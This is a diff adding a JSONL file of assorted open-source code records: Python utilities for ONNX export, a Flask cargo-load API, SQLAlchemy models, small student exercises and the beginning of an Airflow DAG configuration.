diff --git "a/4839.jsonl" "b/4839.jsonl" new file mode 100644--- /dev/null +++ "b/4839.jsonl" @@ -0,0 +1,688 @@ +{"seq_id":"305459625","text":"\"\"\"Hyperparameter domain for exhaustive grid search.\n\nClasses\n-------\nExhaustiveDomain\n Discrete/categorical domain for exhaustive grid search.\n\"\"\"\n\nfrom collections import Sequence\n\nfrom pyrameter.domains.base import Domain\n\n\nclass ExhaustiveDomain(Domain):\n \"\"\"Discrete/categorical domain for exhaustive grid search.\n\n Parameters\n ----------\n name : str\n Name of the domain.\n domain : list\n The grid to search.\n\n Notes\n -----\n Instead of using internal tracking to determine which part of the grid to\n search, this domain is a placeholder used to spawn multiple search space\n graphs. As of now, it is not directly used to generate values.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n if len(args) >= 2:\n super(ExhaustiveDomain, self).__init__(args[0])\n self.domain = args[1]\n elif len(args) == 1:\n super(ExhaustiveDomain, self).__init__()\n self.domain = args[0]\n else:\n raise ValueError('No domain provided.')\n\n @classmethod\n def from_json(cls, obj):\n domain = cls(obj['name'], obj['domain'])\n return domain\n\n @property\n def complexity(self):\n if self._complexity is None:\n try:\n self._complexity = 2 - (1 / len(self.domain))\n except ZeroDivisionError:\n self._complexity = 1\n return self._complexity\n\n def generate(self):\n raise NotImplementedError\n\n def to_json(self):\n jsonified = super(ExhaustiveDomain, self).to_json()\n del jsonified['random_state']\n return jsonified\n","sub_path":"pyrameter/domains/exhaustive.py","file_name":"exhaustive.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"92741023","text":"from flask import Blueprint, request\nfrom google.cloud import datastore\nimport verificationHelper\nimport json\nimport constants\n\nclient = datastore.Client()\n\nbp = Blueprint('load', __name__, url_prefix='/loads')\n\n\n@bp.route('/', methods=['POST', 'GET'])\ndef loads_get_post():\n if request.method == 'POST':\n content = request.get_json()\n payload = verificationHelper.verify_jwt(request)\n if len(payload) == 0:\n return (\"INVALID JWT\", 401)\n if 'destination' not in content.keys():\n return(\"need a destination\", 400)\n if 'weight' not in content.keys():\n return(\"need a weight\", 400)\n if 'contents' not in content.keys():\n return(\"need to know contents\", 400)\n new_load = datastore.entity.Entity(key=client.key(constants.loads))\n new_load.update({'owner': payload, 'weight': content['weight'],\n 'contents': content['contents'], 'destination': content['destination'],\n 'boat': ''})\n client.put(new_load)\n return (str(new_load.key.id), 201)\n elif request.method == 'GET':\n query = client.query(kind=constants.loads)\n q_limit = int(request.args.get('limit', '5'))\n q_offset = int(request.args.get('offset', '0'))\n g_iterator = query.fetch(limit= q_limit, offset=q_offset)\n pages = g_iterator.pages\n results = list(next(pages))\n if g_iterator.next_page_token:\n next_offset = q_offset + q_limit\n next_url = request.base_url + \"?limit=\" + str(q_limit) + \"&offset=\" + str(next_offset)\n else:\n next_url = None\n for e in results:\n e[\"self\"] = request.host_url + 'loads/' + str(e.key.id)\n output = {\"loads\": results}\n if next_url:\n output[\"next\"] = next_url\n return json.dumps(output)\n\n\n@bp.route('/', methods=['DELETE', 'GET', 'PATCH'])\ndef loads_put_delete(id):\n if request.method == 'DELETE':\n content = request.get_json()\n payload = verificationHelper.verify_jwt(request)\n if len(payload) == 0:\n return (\"INVALID JWT\", 401)\n load_key = client.key(constants.loads, int(id))\n load = client.get(key=load_key)\n if load is None:\n return('Invalid load ID', 404)\n elif load['owner'] != payload:\n return('Not your load to delete', 403)\n elif load['boat'] == '':\n client.delete(load_key)\n return('', 204)\n else:\n boat_key = client.key(constants.boats, int(load['boat']))\n boat = client.get(key=boat_key)\n boat['loads'].remove(str(id))\n client.put(boat)\n client.delete(load_key)\n return ('', 204)\n elif request.method == 'GET':\n load_key = client.key(constants.loads, int(id))\n load = client.get(key=load_key)\n if load is None:\n return('Invalid load ID', 404)\n else:\n return (load, 200)\n if request.method == 'PATCH':\n content = request.get_json()\n payload = verificationHelper.verify_jwt(request)\n if len(payload) == 0:\n return (\"INVALID JWT\", 401)\n load_key = client.key(constants.loads, int(id))\n load = client.get(key=load_key)\n if load is None:\n return('Invalid load ID', 404)\n elif load['owner'] != payload:\n return('Not your load to edit', 403)\n content = request.get_json()\n if 'weight' not in content.keys():\n return('I only edit weight', 400)\n else:\n load[\"weight\"] = content[\"weight\"]\n client.put(load)\n return(load, 200)\n else:\n return ('Method not recogonized', 405)","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"179957325","text":"import nuke\n\ndef connect_optical_flares():\n\n node_list = nuke.selectedNodes()\n \n if len(node_list) < 2:\n print('select one ore more transform, followed by an OpticalFlares node')\n return\n \n if node_list[0].Class() != 'OpticalFlares':\n print('Select the OpticalFlares node last')\n return\n\n \n optical_flare_node = node_list[0]\n t_node_list = node_list[1:]\n\n num_transforms = len(t_node_list)\n optical_flare_node['Count'].setValue(num_transforms-1)\n\n for index, t_node in enumerate(t_node_list):\n \n if index == 0:\n knob = optical_flare_node['PositionXY']\n else:\n knob = optical_flare_node['PositionXY{0}'.format(index)]\n\n knob.copyAnimations(t_node['translate'].animations())\n\n\n\n#connect_optical_flares()\n\n\n''' \nnode = nuke.toNode('OpticalFlares1')\n\nfor i in range (node.getNumKnobs()):\n print node.knob(i).name()\n'''\n\n","sub_path":"petfactory/animation/optical_flares/optical_flares.py","file_name":"optical_flares.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"155399133","text":"def convert(s):\n for i in ['B', 'KB', 'MB', 'GB']:\n if s > 1024:\n s /= 1024\n else:\n size_memory = str(float(\"{:.2f}\".format(s))) + i\n break\n return size_memory\n\n\ndef path(s):\n s = s.replace('/', '\\\\')\n return s\n","sub_path":"config/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"54430367","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Feb 12 15:54:51 2021\r\n\r\n@author: Ria Kale\r\n\r\nThis function is designed to output the price a customer will have to pay for a mattress\r\nafter inputting variables\r\n\r\nI completed this assignment individually\r\n\"\"\"\r\n\r\nprices = [[[1800,2200,2400],[1400,1800,200],[900,1300,1500]],[[2000,2500,3000],[1400,1900,2400],[1000,1500,2000]], [400,300,200,100], [100,300]]\r\nidentifiers = [[\"Sealy Mattress\", \"Simmons Mattress\"], [\"King Size\", \"Queen Size\", \"Full Size\", \"Twin Size\"], [\"Medium\", \"Firm\", \"Extra Firm\"]]\r\n\r\ndef mattressPOS(prices):\r\n print(\"Welcome!\")\r\n brand = input(\"Please select the mattress brand (1 - Sealy, 2 - Simmons):\")\r\n while True: \r\n if brand == \"1\" :\r\n brand = 0\r\n size = input(\"Please select the size (K = King, Q= Queen, T = Twin):\")\r\n break\r\n elif brand == \"2\" :\r\n brand = 1\r\n size = input(\"Please select the size (K = King, Q= Queen, F = Full):\")\r\n break\r\n else:\r\n print (\"Please enter a valid response\")\r\n \r\n while True:\r\n if size == \"K\" or size.lower() == \"k\":\r\n size = 0\r\n break\r\n elif size == \"Q\" or size.lower() == \"q\":\r\n size = 1\r\n break\r\n elif size == \"T\" or size.lower() == \"t\":\r\n size = 2\r\n break\r\n elif size == \"F\" or size.lower() == \"f\":\r\n size = 2\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n \r\n while True:\r\n comfort = input(\"Please select comfort level (M - Medium, F - Firm, E - Extra Firm):\")\r\n if comfort == \"M\" or comfort.lower() == \"m\":\r\n comfort = 0\r\n break\r\n elif comfort == \"F\" or comfort.lower() == \"f\":\r\n comfort = 1\r\n break\r\n elif comfort == \"E\" or comfort.lower() == \"e\":\r\n comfort = 2\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n \r\n while True:\r\n box_spring = input(\"Would you like to add box springs (Y - Yes, N - No)?\")\r\n if box_spring ==\"Y\" or box_spring.lower() == \"y\":\r\n box_spring = prices[2][size]\r\n break\r\n elif box_spring ==\"N\" or box_spring.lower() == \"n\":\r\n box_spring = \"${:,.2f}\".format(0)\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n \r\n while True:\r\n shipping = input(\"Which shipping mode do you like (S - Standard, N - Next Day)?\")\r\n if shipping ==\"S\" or shipping.lower() == \"s\":\r\n shipping = 0\r\n break\r\n elif shipping ==\"N\" or shipping.lower() == \"n\":\r\n shipping = 1\r\n break\r\n else:\r\n print(\"Please enter a valid response\")\r\n \r\n promo_code = input(\"Promotion Code:\")\r\n print( )\r\n print( )\r\n \r\n \r\n mattress_price = prices[brand][size][comfort]\r\n formatted_mattress_price = \"${:,.2f}\".format(mattress_price)\r\n \r\n if brand == 0 and size == 2:\r\n size = 3\r\n box_spring_price = prices[2][size]\r\n formatted_spring_price = \"${:,.2f}\".format(box_spring_price)\r\n \r\n if promo_code == \"SLEEP\" or promo_code.lower():\r\n promo_code = -((mattress_price + box_spring_price) * 0.1)\r\n else:\r\n promo_code = 0\r\n \r\n formatted_promo_code = \"${:,.2f}\".format(promo_code)\r\n \r\n subtotal = mattress_price + box_spring_price + promo_code\r\n formatted_subtotal = \"${:,.2f}\".format(subtotal)\r\n \r\n shipping_price = prices[3][shipping]\r\n formatted_shipping_price = \"${:,.2f}\".format(shipping_price)\r\n \r\n tax_rate = subtotal*0.0625\r\n formatted_tax = \"${:,.2f}\".format(tax_rate)\r\n \r\n total = subtotal + shipping_price + tax_rate\r\n formatted_total = \"${:,.2f}\".format(total)\r\n \r\n id_1 = identifiers[0][brand]\r\n id_2 = identifiers[1][size]\r\n id_3 = identifiers[2][comfort]\r\n \r\n print(id_1,\",\", id_2,\",\", id_3)\r\n print( )\r\n print(\"=\"*15, \"Order Summary\", \"=\"*15 )\r\n print( )\r\n print(f\"{'Mattress:':<24} {formatted_mattress_price:>8}\")\r\n print(f\"{'Box Springs:':<24} {formatted_spring_price:>8}\")\r\n print(f\"{'Discount:':<24} {formatted_promo_code:>8}\")\r\n print(f\"{'Subtotal:':<24} {formatted_subtotal:>8}\")\r\n print(f\"{'Shipping:':<24} {formatted_shipping_price:>8}\")\r\n print(f\"{'Tax:':<24} {formatted_tax:>8}\")\r\n print(\"-\"*46)\r\n print(f\"{'Total:':<24} {formatted_total:>8}\")\r\n \r\nmattressPOS(prices)","sub_path":"mattress.py","file_name":"mattress.py","file_ext":"py","file_size_in_byte":4538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"128090305","text":"# import get_int from cs50 library\nfrom cs50 import get_int\n\n# Initialize condition\nrequire = False\nwhile not require:\n # prompt the user to the size of the half-pyramid\n n = get_int(\"Height: \")\n if n >= 1 and n <= 8:\n require = True\n\n# go through each line\nfor i in range(n):\n # print hashes in each line\n print(\" \" * (n - i - 1) + \"#\" * (i + 1))","sub_path":"CS50_2020/Week6/Mario/Less/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"138561744","text":"import datetime\nimport io\nimport itertools\nimport json\nimport os\nimport subprocess\nimport warnings\n\nimport onnx\nimport onnx.numpy_helper\nimport torch\nimport torch.autograd\nfrom torch.onnx import OperatorExportTypes\nfrom torch.onnx.symbolic_helper import _default_onnx_opset_version\nfrom torch.onnx.utils import \\\n _export as torch_export, _model_to_graph as torch_model_to_graph\n\nfrom pytorch_pfn_extras.onnx.annotate import init_annotate\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import \\\n LARGE_TENSOR_DATA_THRESHOLD\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import is_large_tensor\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import _strip_raw_data\nfrom pytorch_pfn_extras.onnx.strip_large_tensor import \\\n _strip_large_initializer_raw_data\n\n\ndef _model_to_graph_with_value_names(*args, add_value_names=True, **kwargs):\n g, p, o = torch_model_to_graph(*args, **kwargs)\n if not add_value_names:\n return g, p, o\n\n for n in g.nodes():\n for v in itertools.chain(n.inputs(), n.outputs()):\n if not v.debugName().isnumeric():\n continue\n old_name = v.debugName()\n new_name = 'v{}_{}'.format(old_name, n.kind().split('::')[-1])\n v.setDebugName(new_name)\n if old_name in p:\n i = p[old_name]\n del p[old_name]\n p[new_name] = i\n return g, p, o\n\n\ndef _export_meta(model, out_dir, strip_large_tensor_data, user_meta):\n ret = {\n 'generated_at': datetime.datetime.now().isoformat(),\n 'output_directory': out_dir,\n 'exporter': 'torch-onnx-utils',\n 'strip_large_tensor_data': strip_large_tensor_data,\n }\n if user_meta:\n ret['user_meta'] = user_meta\n\n try:\n git_status = subprocess.Popen(['git', 'status'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n git_status.communicate()\n\n def strip_cmd(cmd):\n with os.popen(cmd) as f:\n return f.read().strip()\n if git_status.returncode == 0:\n ret['git'] = {\n 'branch': strip_cmd('git rev-parse --abbrev-ref HEAD'),\n 'commit': strip_cmd('git rev-parse HEAD'),\n 'remote': strip_cmd('git ls-remote --get-url origin'),\n 'commit_date': strip_cmd('git show -s --format=%ci HEAD'),\n }\n except FileNotFoundError:\n pass\n\n return ret\n\n\ndef _export_util(model, args, f, **kwargs):\n \"\"\"Wrap operator type to export\n\n Copied from torch.onnx.utils.export, to get output values.\n \"\"\"\n aten = kwargs.get('aten', False)\n export_raw_ir = kwargs.get('export_raw_ir', False)\n operator_export_type = kwargs.get('operator_export_type', None)\n\n if aten or export_raw_ir:\n assert operator_export_type is None\n assert aten ^ export_raw_ir\n operator_export_type = OperatorExportTypes.ATEN if\\\n aten else OperatorExportTypes.RAW\n elif operator_export_type is None:\n if torch.onnx.PYTORCH_ONNX_CAFFE2_BUNDLE:\n operator_export_type = OperatorExportTypes.ONNX_ATEN_FALLBACK\n else:\n operator_export_type = OperatorExportTypes.ONNX\n\n old_model_to_graph = torch.onnx.utils._model_to_graph\n # TODO(ecastill) _model_to_graph shouldn't be direclty overriden\n # This is a temporal workaround until a fix is introduced in PyTorch.\n try:\n torch.onnx.utils._model_to_graph = _model_to_graph_with_value_names\n return torch_export(model, args, f, _retain_param_name=True, **kwargs)\n finally:\n torch.onnx.utils._model_to_graph = old_model_to_graph\n\n\ndef _export(\n model, args, strip_large_tensor_data=False,\n large_tensor_threshold=LARGE_TENSOR_DATA_THRESHOLD, **kwargs):\n model.zero_grad()\n bytesio = io.BytesIO()\n opset_ver = kwargs.get('opset_version', None)\n if opset_ver is None:\n opset_ver = _default_onnx_opset_version\n strip_doc_string = kwargs.pop('strip_doc_string', True)\n with init_annotate(model, opset_ver) as ann:\n outs = _export_util(\n model, args, bytesio, strip_doc_string=False, **kwargs)\n onnx_graph = onnx.load(io.BytesIO(bytesio.getvalue()))\n onnx_graph = ann.set_annotate(onnx_graph)\n onnx_graph = ann.reorg_anchor(onnx_graph)\n if strip_doc_string:\n for node in onnx_graph.graph.node:\n node.doc_string = b''\n if strip_large_tensor_data:\n _strip_large_initializer_raw_data(onnx_graph, large_tensor_threshold)\n\n return onnx_graph, outs\n\n\ndef export(\n model, args, f, return_output=False, strip_large_tensor_data=False,\n large_tensor_threshold=LARGE_TENSOR_DATA_THRESHOLD, **kwargs):\n \"\"\"Export model into ONNX Graph.\n\n Args:\n f: A file-like object or a string file path to be written to this\n file.\n return_output (bool): If True, return output values come from the\n model.\n strip_large_tensor_data (bool): If True, this function will strip\n data of large tensors to reduce ONNX file size for benchmarking\n large_tensor_threshold (int): If number of elements of tensor is\n larger than this value, the tensor is stripped when\n *strip_large_tensor_data* is True\n\n .. warning:: This function is not thread safe.\n\n \"\"\"\n onnx_graph, outs = _export(\n model, args, strip_large_tensor_data, large_tensor_threshold,\n **kwargs)\n\n if hasattr(f, 'write'):\n f.write(onnx_graph.SerializeToString())\n else:\n assert isinstance(f, str)\n warnings.warn(\n 'When export ONNX graph as file, \"export_testcase\" is '\n 'strongly recommended, please consider use it instead',\n UserWarning)\n with open(f, 'wb') as fp:\n fp.write(onnx_graph.SerializeToString())\n\n if return_output:\n return outs\n\n\ndef export_testcase(\n model, args, out_dir, *, output_grad=False, metadata=True,\n model_overwrite=True, strip_large_tensor_data=False,\n large_tensor_threshold=LARGE_TENSOR_DATA_THRESHOLD,\n return_output=False, user_meta=None,\n export_torch_script=False, export_torch_trace=False, **kwargs):\n \"\"\"Export model and I/O tensors of the model in protobuf format.\n\n Args:\n output_grad (bool or Tensor): If True, this function will output\n model's gradient with names 'gradient_%d.pb'. If set Tensor,\n use it as gradient *input*. The gradient inputs are output as\n 'gradient_input_%d.pb' along with gradient.\n metadata (bool): If True, output meta information taken from git log.\n model_overwrite (bool): If False and model.onnx has already existed,\n only export input/output data as another test dataset.\n strip_large_tensor_data (bool): If True, this function will strip\n data of large tensors to reduce ONNX file size for benchmarking\n large_tensor_threshold (int): If number of elements of tensor is\n larger than this value, the tensor is stripped when\n *strip_large_tensor_data* is True\n return_output (bool): If True, return output values come from the\n model.\n export_torch_script (bool): Output model_script.pt using\n torch.jit.script\n export_torch_trace (bool): Output model_trace.pt using torch.jit.trace\n\n .. warning:: This function is not thread safe.\n\n \"\"\"\n\n os.makedirs(out_dir, exist_ok=True)\n input_names = kwargs.pop(\n 'input_names',\n ['input_{}'.format(i) for i in range(len(args))])\n assert len(input_names) == len(args)\n\n onnx_graph, outs = _export(\n model, args, strip_large_tensor_data, large_tensor_threshold,\n input_names=input_names, **kwargs)\n if isinstance(args, torch.Tensor):\n args = args,\n if isinstance(outs, torch.Tensor):\n outs = outs,\n\n # Remove unused inputs\n # - When keep_initializers_as_inputs=True, inputs contains initializers.\n # So we have to filt initializers.\n # - model.onnx is already issued, so we can modify args here.\n initializer_names = [init.name for init in onnx_graph.graph.initializer]\n used_input_index_list = []\n for used_input in onnx_graph.graph.input:\n if used_input.name not in initializer_names:\n used_input_index_list.append(input_names.index(used_input.name))\n input_names = [input_names[i] for i in used_input_index_list]\n args = [args[i] for i in used_input_index_list]\n\n output_path = os.path.join(out_dir, 'model.onnx')\n is_on_memory = True\n if model_overwrite or (not os.path.isfile(output_path)):\n is_on_memory = False\n with open(output_path, 'wb') as fp:\n fp.write(onnx_graph.SerializeToString())\n\n def write_to_pb(f, tensor, name=None):\n array = tensor.detach().cpu().numpy()\n with open(f, 'wb') as fp:\n t = onnx.numpy_helper.from_array(array, name)\n if (strip_large_tensor_data\n and is_large_tensor(t, large_tensor_threshold)):\n _strip_raw_data(t)\n fp.write(t.SerializeToString())\n\n if export_torch_script:\n pt_script_path = os.path.join(out_dir, 'model_script.pt')\n if model_overwrite or (not os.path.isfile(pt_script_path)):\n torch.jit.script(model).save(pt_script_path)\n\n if export_torch_trace:\n pt_trace_path = os.path.join(out_dir, 'model_trace.pt')\n if model_overwrite or (not os.path.isfile(pt_trace_path)):\n torch.jit.trace(model, args).save(pt_trace_path)\n\n data_set_path = os.path.join(out_dir, 'test_data_set_0')\n seq_id = 0\n while is_on_memory and os.path.exists(data_set_path):\n seq_id += 1\n data_set_path = os.path.join(\n out_dir, 'test_data_set_{:d}'.format(seq_id))\n os.makedirs(data_set_path, exist_ok=True)\n for i, (arg, name) in enumerate(zip(args, input_names)):\n f = os.path.join(data_set_path, 'input_{}.pb'.format(i))\n write_to_pb(f, arg, name)\n\n output_names = kwargs.get('output_names')\n if output_names is None:\n if isinstance(outs, dict):\n output_names = outs.keys()\n else:\n output_names = [None] * len(outs)\n for i, name in enumerate(output_names):\n if isinstance(outs, dict):\n out = outs[name]\n else:\n out = outs[i]\n if isinstance(out, (list, tuple)):\n assert len(out) == 1, \\\n 'Models returning nested lists/tuples are not supported yet'\n out = out[0]\n f = os.path.join(data_set_path, 'output_{}.pb'.format(i))\n write_to_pb(f, out, name)\n\n if output_grad is not False:\n if isinstance(output_grad, bool):\n output_grad = [torch.ones_like(outs[idx])\n for idx in range(len(output_names))]\n if isinstance(output_grad, torch.Tensor):\n output_grad = [output_grad]\n for idx in range(len(output_names)):\n write_to_pb(\n os.path.join(data_set_path, 'gradient_input_{}.pb'.format(\n idx)), output_grad[idx],\n output_names[idx])\n if len(output_names) == len(outs):\n torch.autograd.backward(outs, grad_tensors=output_grad)\n else:\n assert len(\n output_names) == 1, 'Single output names is only supported'\n outs[0].backward(output_grad[0])\n\n for i, (name, param) in enumerate(model.named_parameters()):\n f = os.path.join(data_set_path, 'gradient_{}.pb'.format(i))\n # NOTE: name does not follow C identifier syntax rules,\n # like \"fc1.bias\", not cleanse for now\n if param.grad is None:\n warnings.warn(\n 'Parameter `{}` does not have gradient value'.format(name))\n else:\n write_to_pb(f, param.grad, name)\n\n if user_meta is None:\n user_meta = {}\n\n if metadata:\n with open(os.path.join(out_dir, 'meta.json'), 'w') as f:\n json.dump(_export_meta(model, out_dir, strip_large_tensor_data,\n user_meta), f, indent=2)\n elif user_meta:\n warnings.warn(\n '\"user_meta\" is given but \"metadata\" is False. '\n '\"user_meta\" is not exported.',\n UserWarning)\n\n if return_output:\n return outs\n","sub_path":"pytorch_pfn_extras/onnx/export_testcase.py","file_name":"export_testcase.py","file_ext":"py","file_size_in_byte":12510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"605911847","text":"import torch\nimport sys\nfrom fairseq.models.bart import BARTModel\nfrom tqdm import tqdm \n\n\nsplit = sys.argv[1]\n\nbart = BARTModel.from_pretrained(\n 'tmp/saved_models_final/',\n checkpoint_file='checkpoint_best.pt',\n data_name_or_path='commongen-bin'\n)\n\nbart.cuda()\nbart.eval()\nbart.half()\ncount = 1\nbsz = 256\nwith open('../../../evaluation/csqa/csqa.%s.qac.src'%split) as source:\n source_lines = source.read().split(\"\\n\")\nsline = source_lines[0]\nslines = [sline]\ni = 0\nres = []\nscores = []\nfor sline in tqdm(source_lines[1:]):\n if count % bsz == 0:\n with torch.no_grad():\n hypotheses_batch = bart.sample(slines, output_score=True, beam=5, lenpen=0, max_len_b=64, no_repeat_ngram_size=2, min_len=2)\n\n for hypothesis in hypotheses_batch:\n res.append(hypothesis[0])\n scores.append(hypothesis[1])\n # fout.write(hypothesis + '\\n')\n # fout.flush()\n slines = []\n i += 1\n # print(i)\n slines.append(sline.strip())\n count += 1\nif slines != []:\n hypotheses_batch = bart.sample(slines, output_score=True, beam=5, lenpen=0, max_len_b=64, no_repeat_ngram_size=2, min_len=2)\n for hypothesis in hypotheses_batch:\n res.append(hypothesis[0])\n scores.append(hypothesis[1])\n # fout.write(hypothesis + '\\n')\n # fout.flush()\nwith open('../../../evaluation/csqa/csqa.%s.qac.bart.res'%split, 'w') as fout:\n fout.write(\"\\n\".join(res))\n\nwith open('../../../evaluation/csqa/csqa.%s.qac.bart.scores'%split, 'w') as fout:\n fout.write(\"\\n\".join([str(float(s)) for s in scores]))\n ","sub_path":"methods/BART/fairseq_local/bart-csqa.py","file_name":"bart-csqa.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"94218797","text":"from sqlalchemy import Table, Column, Integer, Text, Float, ForeignKey, Date\r\nfrom sqlalchemy.orm import mapper\r\nfrom database import metadata, db_session\r\n\r\nclass BlogPost(object):\r\n query = db_session.query_property()\r\n def __init__(self, id=None, title=None, post=None):\r\n self.id = id\r\n self.title = title\r\n self.post = post\r\n\r\nblog_posts = Table('blog_posts', metadata,\r\n Column('id', Integer, primary_key=True),\r\n Column('title', Text),\r\n Column('post', Text)\r\n)\r\n\r\nmapper(BlogPost, blog_posts)\r\n\r\n\r\nclass Item_details(object):\r\n query = db_session.query_property()\r\n def __init__(self, item_id=None, item_name=None,carbon_intensity=None,type_name=None,kg=None):\r\n self.item_id = item_id\r\n self.item_name = item_name\r\n self.carbon_intensity=carbon_intensity\r\n self.type_name=type_name\r\n self.kg=kg\r\n\r\n def serialize(self):\r\n \treturn {\"item_id\":self.item_id,\"item_name\":self.item_name,\"carbon_intensity\":self.carbon_intensity,\"type_name\":self.type_name,\"kg\":self.kg}\r\n \r\n\r\nitems = Table('item_details', metadata,\r\n Column('item_id', Integer, primary_key=True),\r\n Column('item_name', Text),\r\n Column('type_name', Text),\r\n Column('carbon_intensity',Float),\r\n Column('kg',Float)\r\n \r\n)\r\n\r\nmapper(Item_details, items)\r\n\r\n\r\nclass Color(object):\r\n query = db_session.query_property()\r\n def __init__(self, color_id=None, color_name=None):\r\n self.color_id = color_id\r\n self.color_name = color_name\r\n\r\n def serialize(self):\r\n \treturn {\"color_id\":self.color_id,\"color_name\":self.color_name}\r\n \r\n\r\ncolors = Table('colors', metadata,\r\n Column('color_id', Integer, primary_key=True),\r\n Column('color_name', Text)\r\n \r\n)\r\n\r\nmapper(Color, colors)\r\n\r\n\r\nclass Year(object):\r\n query = db_session.query_property()\r\n def __init__(self, year_id=None, year_range=None):\r\n self.year_id = year_id\r\n self.year_range = year_range\r\n\r\n\r\n def serialize(self):\r\n \treturn {\"year_id\":self.year_id,\"year_range\":self.year_range}\r\n \r\n\r\nyears = Table('years', metadata,\r\n Column('year_id', Integer, primary_key=True),\r\n Column('year_range', Text)\r\n \r\n)\r\n\r\nmapper(Year, years)\r\n\r\nclass Postitem(object):\r\n query = db_session.query_property()\r\n def __init__(self, post_id=None,item_id=None,color_id=None,year_id=None,latitude=None,longitude=None,status=None):\r\n self.post_id=post_id\r\n self.item_id=item_id\r\n self.color_id=color_id\r\n self.year_id=year_id\r\n self.latitude=latitude\r\n self.longitude=longitude\r\n self.status=status\r\n\r\n def serialize(self):\r\n \treturn {\"post_id\":self.post_id,\"item_id\":self.item_id,\"color_id\":self.color_id,\"year_id\":self.year_id,\"latitude\":self.latitude,\"longitude\":self.longitude,\"status\":self.status}\r\n \r\n\r\nposts = Table('posts', metadata,\r\n Column('post_id', Integer, primary_key=True),\r\n Column('item_id', Integer, ForeignKey(Item_details.item_id)),\r\n Column('color_id', Integer,ForeignKey(Color.color_id)),\r\n Column('year_id', Integer,ForeignKey(Year.year_id)),\r\n Column('latitude', Float),\r\n Column('longitude', Float),\r\n Column('status', Integer),\r\n \r\n)\r\n\r\n\r\nmapper(Postitem, posts)\r\n\r\nclass Carbon(object):\r\n query = db_session.query_property()\r\n def __init__(self, record_id=None, item_name=None,carbon_intensity=None):\r\n self.record_id = record_id\r\n self.item_name = item_name\r\n self.carbon_intensity=carbon_intensity\r\n\r\n def serialize(self):\r\n \treturn {\"record_id\":self.record_id,\"item_name\":self.item_name,\"carbon_intensity\":self.carbon_intensity}\r\n \r\n\r\ncarbons = Table('carbonintensity', metadata,\r\n Column('record_id', Integer, primary_key=True),\r\n Column('item_name', Text),\r\n Column('carbon_intensity',Float)\r\n \r\n)\r\n\r\nmapper(Carbon, carbons)\r\n\r\nclass UserDetail(object):\r\n\tquery = db_session.query_property()\r\n\tdef __init__(self,user_email=None,user_name=None):\r\n\t\tself.user_email = user_email\r\n\t\tself.user_name = user_name\r\n\tdef serialize(self):\r\n\t\treturn {\"user_email\":self.user_email,\"user_name\":self.user_name}\r\n \r\n\r\nuserDetail = Table('user_details', metadata,\r\n Column('user_email', Text, primary_key=True),\r\n Column('user_name', Text)\r\n \r\n \r\n)\r\n\r\nmapper(UserDetail, userDetail)\r\n\r\n\r\nclass UserActivity(object):\r\n query = db_session.query_property()\r\n def __init__(self,record_id=None,user_email=None,post_id=None,contributed_date=None,activity_category=None):\r\n \tself.record_id=record_id\r\n \tself.user_email = user_email\r\n \tself.contributed_date = contributed_date\r\n \tself.post_id=post_id\r\n \tself.activity_category=activity_category\r\n \r\n\r\n def serialize(self):\r\n \treturn {\"record_id\":self.record_id,\"user_email\":self.user_email,\"post_id\":self.post_id,\"contributed_date\":self.contributed_date,\"activity_category\":self.activity_category}\r\n \r\n\r\nuserActivity = Table('user_activity', metadata,\r\n\tColumn('record_id', Integer, primary_key=True),\r\n Column('user_email', ForeignKey(UserDetail.user_email)),\r\n Column('post_id', Integer,ForeignKey(Postitem.post_id)),\r\n Column('contributed_date',Date),\r\n Column('activity_category',Integer)\r\n \r\n \r\n)\r\n\r\nmapper(UserActivity, userActivity)\r\n\r\n\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"260861665","text":"import os\n\nfrom airflow.models import DAG\nfrom airflow.operators.docker_operator import DockerOperator\nfrom pendulum import datetime, duration\n\nfrom utils.onepassword import get_env_vars_task\nfrom utils.knack import get_date_filter_arg\nfrom utils.slack_operator import task_fail_slack_alert\n\nDEPLOYMENT_ENVIRONMENT = os.getenv(\"ENVIRONMENT\", \"development\")\n\nDEFAULT_ARGS = {\n \"owner\": \"airflow\",\n \"depends_on_past\": False,\n \"start_date\": datetime(2015, 1, 1, tz=\"America/Chicago\"),\n \"email_on_failure\": False,\n \"email_on_retry\": False,\n \"retries\": 0,\n \"execution_timeout\": duration(minutes=5),\n \"on_failure_callback\": task_fail_slack_alert,\n}\n\nREQUIRED_SECRETS = {\n \"KNACK_APP_ID\": {\n \"opitem\": \"Knack Signs and Markings\",\n \"opfield\": f\"production.appId\",\n },\n \"KNACK_API_KEY\": {\n \"opitem\": \"Knack Signs and Markings\",\n \"opfield\": f\"production.apiKey\",\n },\n \"PGREST_ENDPOINT\": {\n \"opitem\": \"atd-knack-services PostgREST\",\n \"opfield\": \"production.endpoint\",\n },\n \"PGREST_JWT\": {\n \"opitem\": \"atd-knack-services PostgREST\",\n \"opfield\": \"production.jwt\",\n },\n 